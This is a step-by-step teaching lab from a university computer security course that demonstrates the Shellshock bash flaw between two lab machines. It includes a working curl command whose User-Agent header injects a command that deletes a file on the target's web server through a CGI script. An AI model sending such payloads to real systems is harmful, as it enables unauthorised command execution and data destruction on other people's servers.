###################### # Shellshock example # @author Kami Vaniea # # The following are a set of commands developed for the # Computer Security course at University of Edinburgh. # # Comments start with a # symbol # Commands that should be typed into alice's terminal start with: # alice> # Commands that should be typed into mallet's terminal start with: # mallet> ###################### ## # Step 1: Create a hello world CGI file entitled myprog.cgi using the following commands ## alice> echo '#!/bin/bash' > /usr/lib/cgi-bin/myprog.cgi alice> echo 'echo "Content-type: text/plain"' >> /usr/lib/cgi-bin/myprog.cgi alice> echo 'echo ' >> /usr/lib/cgi-bin/myprog.cgi alice> echo 'echo "Hello World"' >> /usr/lib/cgi-bin/myprog.cgi # Visit the new page using Firefox on Alice # http://alice/cgi-bin/myprog.cgi # You should see the words "Hello World" ## # Step 2: Setup a victim file on Alice ## alice> cd /var/www/ alice> echo 'Test file' > test.txt alice> ls # The ls should show multiple files including test.txt ## # Step 3: Mallet uses Shellshock to delete the test.txt file on alice ## # Make sure that mallet can read the page mallet> curl http://alice/cgi-bin/myprog.cgi # Should result in "Hello World" mallet> curl -A "() { :; }; /bin/rm /var/www/test.txt" http://alice/cgi-bin/myprog.cgi # Results in an error ## # Step 4: Alice's file is gone! ## alice> ls /var/www/ # test.txt should no longer appear